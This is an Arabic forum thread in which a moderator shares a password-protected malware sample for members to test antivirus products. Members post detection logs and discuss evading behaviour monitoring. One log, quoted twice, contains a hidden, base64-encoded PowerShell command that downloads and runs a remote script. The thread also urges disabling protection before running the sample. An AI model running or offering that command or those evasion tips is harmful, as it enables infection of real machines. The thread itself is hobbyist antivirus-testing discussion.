• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

تشفيرة ملف خبيث لتجربته بالتشغيل بتاريخ اليوم 14-11-2024

Ramy Badraan

Ramy BadraanRamy Badraan is verified member.

مراقب قسم الحماية وانظمة لينكس -مصمم بنرات المنتدى
طـــاقم الإدارة
★★ نجم المنتدى ★★
فريق الدعم لقسم الحماية
نجم الشهر
فريق التصميم
كبار الشخصيات
إنضم
26 أكتوبر 2008
المشاركات
3,129
مستوى التفاعل
6,600
النقاط
4,100
الإقامة
مصر
الموقع الالكتروني
www.facebook.com
غير متصل
JqZJplx.gif


ملف مطلوب تجربته بالتشغيل
حتى لو اكتشفه بفك الضغط او الفحص للاشتباه نظراً للتوقيع المبهم
اوقف الفحص وجرب التشغيل
(ممنوع الرفع على فايرس توتال)


الخبراء بس هما اللى يجربوا
وتجميد النظام ضرورى جدا

Tiq9c81.png


P4a2E63.png



يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


or

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي



باسوورد فك الضغط

infected
 

توقيع : Ramy BadraanRamy Badraan is verified member.
@khaled_jtv
احتمال يتخطى بت ديفندر على فكرة
او هيكتشفه بعد ما يشتغل شوية مش على طول
علشان بت ديفندر بيحلل سلوك بالتايم لاين بتاع الملف
ودى ميزة بس فى نفس الوقت عيب قااااااااااااتل
 
توقيع : Ramy BadraanRamy Badraan is verified member.
بالفحص مكتشف من النود
1731587620702.webp



اوقفت الحماية الفعلية وشغلت الملف


1731587668287.webp
 
توقيع : احمد المخاتره
احمد المخاتره قال:
بالفحص مكتشف من النود
مشاهدة المرفق 262236


اوقفت الحماية الفعلية وشغلت الملف
قام النود بحذف الملف

مشاهدة المرفق 262237
أنقر للتوسيع...
لا نود بدأ يظبط نفسه جامد اليومين دول بعد الاصدار الاخير اللى نزل اخر شهر 10 تقريباً
محرك الفحص اتطور وال hips كمان
طبعاً بعد ما كاسبر وقع كل الامريكين بقوا يشتروا النود وبت ديفندر والبلية لعبت معاهم :tearsofjoy: :tearsofjoy:
علشان كدة تلاقى مستواهم بقى كويس الفترة دى
الفلوس بتغير
 
توقيع : Ramy BadraanRamy Badraan is verified member.
الكاسبرسكي


1731588371004.webp


1731588195349.webp
 
توقيع : احمد المخاتره
联想截图_20241114124929.webp
 
توقيع : tiktoshitiktoshi is verified member.
توقيع : Ramy BadraanRamy Badraan is verified member.
توقيع : tiktoshitiktoshi is verified member.
tiktoshi قال:
اكتفي بالفحص ai فقط. بالتشغيل اترك الامر لبت ديفندر
أنقر للتوسيع...
طب كابتن
تعرف ابو الهول؟؟ بيقولك خد دول 👇👇 :tearsofjoy: :tearsofjoy:
3 ملفات عنب
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

وجرب عليهم كاسبر يا باشا @احمد المخاتره
غالبا كاسبر لما يشوفهم هيمسح نفسه من على الجهاز ويعملك بلوك :tearsofjoy::tearsofjoy:
 
توقيع : Ramy BadraanRamy Badraan is verified member.
ملف obs
Detection: HEUR:Trojan/Python.ShellLoader.ap
Detection ID: 69D4249C59C8326D
Path: C:\Users\tikk\Desktop\obs\obs.exe
Action: Read
Result: deleted

Process ID: 6400
Process: C:\Windows\explorer.exe
Process Command line: C:\Windows\Explorer.EXE
Parent Process ID: 6360
Parent: C:\Windows\System32\userinit.exe



ملف 11


Detection: Trojan/PS.Encpe.a
Detection ID: 2B51E8496B7C9729
Path: PowerShell_3FC5E67E7A2EE308AF0369D0E187775E36315E3E
Action: Execute
Result: cleaned

Process ID: 6232
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command line: powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
Parent Process ID: 9632
Parent: C:\Windows\System32\cmd.exe


ملف 33 به مشكل لم اتحقق منه شوة انا مستعجل بعد شوي راجع ليكم خهههههههههههههه

联想截图_20241114133306.webp
 
توقيع : tiktoshitiktoshi is verified member.
tiktoshi قال:
ملف obs
Detection: HEUR:Trojan/Python.ShellLoader.ap
Detection ID: 69D4249C59C8326D
Path: C:\Users\tikk\Desktop\obs\obs.exe
Action: Read
Result: deleted

Process ID: 6400
Process: C:\Windows\explorer.exe
Process Command line: C:\Windows\Explorer.EXE
Parent Process ID: 6360
Parent: C:\Windows\System32\userinit.exe



ملف 11


Detection: Trojan/PS.Encpe.a
Detection ID: 2B51E8496B7C9729
Path: PowerShell_3FC5E67E7A2EE308AF0369D0E187775E36315E3E
Action: Execute
Result: cleaned

Process ID: 6232
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command line: powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
Parent Process ID: 9632
Parent: C:\Windows\System32\cmd.exe


ملف 33 به مشكل لم اتحقق منه شوة انا مستعجل بعد شوي راجع ليكم خهههههههههههههه

مشاهدة المرفق 262242
أنقر للتوسيع...
يعنى هى دى الحجة؟؟
عنيا يا صاحبى خد ملف ال dll اللى هو محتاجه
حط الاتنين فى فولدر واحد وجرب التشغيل تانى
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
 
توقيع : Ramy BadraanRamy Badraan is verified member.
توقيع : tiktoshitiktoshi is verified member.

tiktoshi

بيتدفندر ؟ تم تجاوزه ؟
أعتقد ان الفكرة ان خاصية advanced threat defence تصنف الملف حين التشغيل لأول مرة بعد ذلك تثق بالملف وسلوكياته هنا يكون المخترق مسبقاََ برمجه على انه يشتغل بعد اسبوع او شهر وهنا برنامج الحماية قد يكون وثق مسبقا بالملف ولن يفحصه مجدداََ
 
التعديل الأخير:
tiktoshi قال:
ملف 33 اشتغل عادي و لا اتصال و اي تنبيه
أنقر للتوسيع...
يا عينى
معلش
قولتلك هواوى محتاج اسكرينة مسمعتش كلامى :222D
 
توقيع : Ramy BadraanRamy Badraan is verified member.
Ramy Badraan قال:
يا عينى
معلش
قولتلك هواوى محتاج اسكرينة مسمعتش كلامى :222D
أنقر للتوسيع...
لا يحبيبي هواوي كان مشعول عشانك
اتفضل
تحديث جديد للمحرك بعد تجربة هههه
مش قاعدة دا محرك
联想截图_20241115014239.webp
 
توقيع : tiktoshitiktoshi is verified member.
tiktoshi قال:
لا يحبيبي هواوي كان مشعول عشانك
اتفضل
تحديث جديد للمحرك بعد تجربة هههه
مش قاعدة دا محرك
مشاهدة المرفق 262274
أنقر للتوسيع...
اه بعد ما جربت اول مرة راح تخطاه فهو بقى راح رفع الملفات على السحابة بتاعته فالدعم فحصوا الملفات لقيوها ملغومة راح منزلينهم فى التحديث
خطة فى منتهى الذكاء :tearsofjoy:
 
توقيع : Ramy BadraanRamy Badraan is verified member.
Ramy Badraan قال:
@khaled_jtv
احتمال يتخطى بت ديفندر على فكرة
او هيكتشفه بعد ما يشتغل شوية مش على طول
علشان بت ديفندر بيحلل سلوك بالتايم لاين بتاع الملف
ودى ميزة بس فى نفس الوقت عيب قااااااااااااتل
أنقر للتوسيع...
انا معك انها نقطة ضعف
على فكره البت تطور اليومين دول بشكل
ممتاز
تحياتي
 
التعديل الأخير:
Ramy Badraan قال:
اه بعد ما جربت اول مرة راح تخطاه فهو بقى راح رفع الملفات على السحابة بتاعته فالدعم فحصوا الملفات لقيوها ملغومة راح منزلينهم فى التحديث
خطة فى منتهى الذكاء :tearsofjoy:
أنقر للتوسيع...
هواوي سيضيف 6 طبقات عشان برامج الفدية
دا هواوي مش فاصل شحن على طول هههه مثل زي البرامج لي فصلت شحن و عاد بعتمد على باور بانك وافيرا و افاست و بولجارد بجنبها هههه
بولجارد سيستدبل ماكان دييب جارد في f-secure
:222p:222p
 
توقيع : tiktoshitiktoshi is verified member.
khaled_jtv قال:
انا معك انها نقطة ضعف
على فكره البت تطور اليومين دول بشكل
ممتاز
تحياتي
أنقر للتوسيع...
انت جربته علي الملف ولا لا؟؟
 
توقيع : Ramy BadraanRamy Badraan is verified member.
tiktoshi قال:
هواوي سيضيف 6 طبقات عشان برامج الفدية
دا هواوي مش فاصل شحن على طول هههه مثل زي البرامج لي فصلت شحن و عاد بعتمد على باور بانك وافيرا و افاست و بولجارد بجنبها هههه
بولجارد سيستدبل ماكان دييب جارد في f-secure
:222p:222p
أنقر للتوسيع...
يا عم خليه يضيف براحته
عقبال ما يبقى برنامج حماية يا رب
انا بتمناله الخير زى ما بتمناه لكومودو بالظبط
 
توقيع : Ramy BadraanRamy Badraan is verified member.
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
عودة
أعلى